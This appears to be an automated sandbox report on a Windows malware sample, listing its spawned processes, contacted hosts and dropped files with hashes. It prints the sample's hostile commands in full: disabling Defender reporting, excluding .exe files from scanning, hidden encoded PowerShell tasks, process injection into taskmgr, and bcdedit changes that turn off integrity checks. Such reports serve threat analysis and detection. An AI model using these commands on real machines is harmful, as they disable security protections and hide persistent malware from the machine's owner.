C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe
"C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsWCAzaZg" /SC once /ST 00:00:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmOoiYpFB" /SC once /ST 01:03:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsWCAzaZg"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmOoiYpFB"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {791434CA-9BD5-46D0-9F35-B0B5813A86CB} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsWCAzaZg"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21095658774178971377396183983929217012123689365-831397659929063165409336297"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmOoiYpFB"
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe
"C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\KQSVjie.exe\" id /NWsite_idxoz 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\DCLNGyf.exe\" id /Pxsite_idYFS 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1568846536-2115391832831922554-394445826-2010898833-88320264-1151140595-1460602350"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9180188102057878665106981987417379633054467495152788509991045609518-2139180974"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-95711784-65960448685985863-8988650449687538311357155801-419907471845409676"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mihomeme.info | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| IE | 38.180.21.119:80 | mihomeme.info | tcp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.160.247:443 | operandotwo.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | guseman.org | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 172.67.170.65:443 | lawyerbuyer.org | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.144:80 | | tcp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| US | 46.226.167.187:80 | 46.226.167.187 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 25f404ab-b513-4fe5-ba0d-541e946e4bd4.uuid.filesdumpplace.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server10.filesdumpplace.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| BG | 185.82.216.96:443 | server10.filesdumpplace.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| GB | 142.251.29.127:19302 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| BG | 185.82.216.96:443 | server10.filesdumpplace.org | tcp |
Files
memory/1260-0-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-2-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1260-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-13-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar370F.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3fd2edfba705634e0a2efd9590efebbf |
| SHA1 | 210a16f160e21430b7ced9b64d569a9f4a687949 |
| SHA256 | 128ecb3d5d37f8819637e3dda0cb232e5d7c8aa070471d85dc94900d664dba7e |
| SHA512 | 4a79f69f9f70b43206e3e2aff55d1beadf2d4c1924c50552dcc3e18dd98172565433e46cf9bfa830aa11df122f591caaaa5b75f7cafece6d649597eeffb89855 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aed10075d68ae6998ff64914966b11a7 |
| SHA1 | 56dd59d0e92047aa49b8de29bae5f875bf439538 |
| SHA256 | 6becaf4984e4d8689f25705e26f6f4d1e269eb030ccce28ae689a3c047fca2d6 |
| SHA512 | 0f8763d93e36035d7879eb5f81963da5accebf4daeb22a6d0a14d9af7ab02d2955d36e1bf2f4c6ad3547301392696e1907dfd83120443a88dea2925c144922b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2149a2a8e0dad699b0719df34c6c254b |
| SHA1 | a4c18362ba1a62bb0a7c250584c8325f509c8079 |
| SHA256 | 417c9b5ac1e6a6f34161b978db0776cec90ef919928472630ff9908ffe36c65d |
| SHA512 | bab38381ebfa8ce7d9f5aa3f05d300d863684e86b19d7d549c1bc0c5ef5a07846eb13b4e028fa55fc68eb6d107eddfd664317c707c00f9d6e673caf7246bf8b7 |
\Users\Admin\Pictures\9WeXljfUZ79vrcuk6JsMXzJp.exe
| MD5 | b46ef79a30cf9668a63ff8117f36f749 |
| SHA1 | 23c339a3eb84d2d9dedf4ae0eafeaaa8d5cde7ed |
| SHA256 | 248e44bc57e583378e77b3b1d6d9677a9dcd00187ea0aa3cbe073fa6fba984fc |
| SHA512 | 2891d70de1be8e7c2a5eebb88b6b8fc2c70cf1278a6d81ecb2b1220c44986eea4938c6a1cf7321b33d347cf4313d5520c3c24a017ceec2087b69ca07c12709da |
memory/1692-279-0x0000000000690000-0x0000000000790000-memory.dmp
memory/1692-290-0x0000000000230000-0x000000000029E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6995692959e94acb8adaa5fd445ea1c7 |
| SHA1 | ec3b39cc19fedd77e476af9647779cc909aaec42 |
| SHA256 | ca3fe7ddc56a06f9c3713530ef355ab392e9ef9963b8d2f3d94b8cccf6c6ecc5 |
| SHA512 | d8f2f4266afc3a5c111d2e9c06d817d7dff54380f767afec29109bfa4282100b582f074d23077ffbebb7337b4a439f56a260e0d0e524e829e4d18bf4bcaf026c |
memory/1692-312-0x0000000000400000-0x0000000000563000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 108c01d94ee1bba05d71c6a204f2ec12 |
| SHA1 | 008015cdd41c3598f201224e744bb6e4bda1bd85 |
| SHA256 | 438021c2a2c57a9f306f9d4894b509e8ddd749d76ff1d278af0d019818642330 |
| SHA512 | 3890ed67bb9f1c2e8a270eab67ce75d69e934b11de5b671b41ae68ccd677ec541ddeae5183d1cd39c155c80885dcdbb09cbc2f5a48be6b0819f3dbe57b9616d1 |
\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
| MD5 | 1a437a8204040da4c0244f453be85309 |
| SHA1 | d627511d8f47ae29857d35857b9ce00700f43b35 |
| SHA256 | 8d0e2c499abab5bccfbaf89150cc1d02ec2d4dd03e40568b6d6968cb57160275 |
| SHA512 | fd88a4f7af01d5705cfa2b449a366da57083e6278321614a89bab0779d8f657af35ba24122b78f27be76112c32f1aa1569b7798bea868c72b75f45487d1ec886 |
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
| MD5 | 36df303e22db2d7a169883551712d8be |
| SHA1 | f8896876297e56aeab1ac70b76c8c89b9c41bfaf |
| SHA256 | ade273d2965e081dd1a4763b79741693948c5f91147d527e5ad4d6a1102738ca |
| SHA512 | 7f740af64295f373ebbea6f9140fd0e67554acc69f1f10aef538dccd7bab50a45406d590babb8f14d8615151e65c08f80a4d688bb3be09ed827c68b755b81988 |
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
| MD5 | 79587e637b36cb16d2f7c37c0d02ba98 |
| SHA1 | 420bdcccb024aadd745ee7e811c8182a89ea61ac |
| SHA256 | 2cee502fb3af9e0253e823ced351d884a91a3af492d397c0a8b9597a4fc36fb2 |
| SHA512 | 71165f739ae65783ed166c4c5171572807a721373b52a5726e12e4ee1025cfe7fdff216a59694f106c63015e13f33b425608511751e8bbf5c6f645cfe2fbbb47 |
\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
| MD5 | 5a4b155c54c67a4f7d243e5e2054272a |
| SHA1 | 9f34dcab702f235e11148061d65220f6543ede95 |
| SHA256 | fd110843874ffdf5052832cfde20ff5c34a81548bde38fa29cb18031b927f36e |
| SHA512 | 3d832a31527120c1403bd10401d7fa902728fdfc682a9ef68f0591070994a0719588043c61f1c58f4923064afefe52981fcba7c0533375f64313907488f2252e |
\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
| MD5 | 4c578911ca6d7dc32cfeb0ccd9658aea |
| SHA1 | eb1c732e53808d687d77f1d4e09eaff276c27968 |
| SHA256 | d27ec96e9f9fd069111984f485d6387ae1623edb41082cb35f44060dc40044bf |
| SHA512 | 6ba34c3063af93e36cd82b375b04cf1265cad13292a611d81cc0c57ad19fa7abcd897dfbfb6a5e77ab65629741ac02f027add300931f34d23e920d4cd7e303f6 |
memory/2472-396-0x00000000026C0000-0x0000000002AB8000-memory.dmp
memory/2452-395-0x00000000027B0000-0x0000000002BA8000-memory.dmp
\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
| MD5 | 1c6db61d4f99c5c52d96e8c0ddff790a |
| SHA1 | c977fd9833d02f4d651b0b99bbfe1383ff4d7525 |
| SHA256 | ea47363b173f1916f4fb7b01bd408ade3b329b34c3c102b390760918f18ee19d |
| SHA512 | 85f037a2ac20647f8774a28617929d45e74ab6d9b5f45cabe4ccff78ee321e8fff2db4ced5c8192f36beb63d9411815c8843a859f1c583ed6a457045a5e8967f |
memory/2452-397-0x00000000027B0000-0x0000000002BA8000-memory.dmp
\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
| MD5 | 174d33593d030c040ded560ccc8dba80 |
| SHA1 | 0c6b101635432543d114a5f9c810fd7db592a2fd |
| SHA256 | 493f2fb1025d215c535e451aad3dcd9fd36ced01fdef690d8b2ef5fc05a08da4 |
| SHA512 | b82b778727f72eb845994889502a80eb5331769606bd9284e0329393c23316a2f658e5b81eb4ca5ee19805b269b2191e03281805e7092dd10fb4fcac70f06cad |
C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
| MD5 | de7fbcdf8e5bd9c5382542e91f689391 |
| SHA1 | a431dc09e3b53d67d074c84cf6e441533e0f12e8 |
| SHA256 | fb86a760ceee950f41b006a246704d429cbaebeb2a053408dba08f12e7a791bc |
| SHA512 | 2951fc16162257572df0d1589a120c7abe81861f4917ec78626666ca1e9961afbca547f92f5053afab9c5164ce8e837bff966d8763d13594603fed3680eb2d87 |
\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
| MD5 | 82600b8a7f627b4c7cf27d6564a6b43f |
| SHA1 | bf1820f2af3a8194e1c70a3f4c12f49b6c38fc77 |
| SHA256 | 0742013283b7dc617aa629b859a8a58859cebb6e1bed287525112c62d57387c3 |
| SHA512 | ed3c88c8e48a3d6425b7182ce07ded000edbdf9a8b65b4a4b0afe8b760971274e30065e59c78eeddbd063ceeb7fde9ea899bd72ab195d59a85eb0924fedf9a1c |
memory/2452-403-0x0000000002BB0000-0x000000000349B000-memory.dmp
memory/2032-424-0x0000000002640000-0x0000000002A38000-memory.dmp
memory/2472-425-0x00000000026C0000-0x0000000002AB8000-memory.dmp
memory/2472-426-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2452-427-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2032-429-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2032-430-0x0000000002640000-0x0000000002A38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe
| MD5 | 84ed25c09a18bbdc878f1fec94c774bd |
| SHA1 | 63cd5b27ce2b3cd12d63282a567627c4891c5471 |
| SHA256 | 3dd9f7cc62b7f0a7a448c9dbf34565d27937b8a2f0ba666991a9825810ed0976 |
| SHA512 | 6f5284be822a53df875acd656600bfa314ff60505ca8cfb4bf5448aa0544933dc28467376f7ff06d78f084449a0846defe62daad814bd1cf7a17079be5362ca6 |
\Users\Admin\AppData\Local\Temp\u1b0.0.exe
| MD5 | 616e6b917490619b2062222e027bd0e2 |
| SHA1 | 14602ad5c62155e7f182aa8b92c01c2adcfac781 |
| SHA256 | 7db2c0e78bbb2056514ab5fee5230e038e07fafe77e7ce50bf3f602d6ba7420a |
| SHA512 | 371de202863bcd4e6c54a0c8f648f63c36bdb0a876e3597a497672b065cafb0d2e7b5f87605950dff582b0c29980fa904f8362a4e9d60abb4384a0d61839039f |
\Users\Admin\AppData\Local\Temp\u1b0.0.exe
| MD5 | 1e8ea78aebb81bd44b8255e6d767c923 |
| SHA1 | 4507ca3671594c4e5f4f7792747abc09d27b68d2 |
| SHA256 | 483238eed5ff901d1f78c5023b90ffc816bbb0e2d7badd15147e4d168b58eb94 |
| SHA512 | f99f3624d46329ca0a02c00ea6bf73193264a8dd65b3eccb4aae224e179312f6b36c1b2a6fc089a7305f7f76b8755cd41a16b6ad18d51845ef1f3bf2ef47de0e |
C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe
| MD5 | 360718555b4f645e171ea34f6241f134 |
| SHA1 | 0d4c6d5b309e352d81c661276f72edccf5813cd2 |
| SHA256 | ecb7a4dfeff6614dedb805754067dc9de5a5d1753a0bd6d39a6ec404b88c10df |
| SHA512 | f461dabecbc9ccc38c06944e9e1211363704e024fdb25b8e93fc7f583cedd2789eb54973ce80d923fc4087343e52e33920989607e8da85e105b6b0545af52b4d |
\Users\Admin\AppData\Local\Temp\u1b0.0.exe
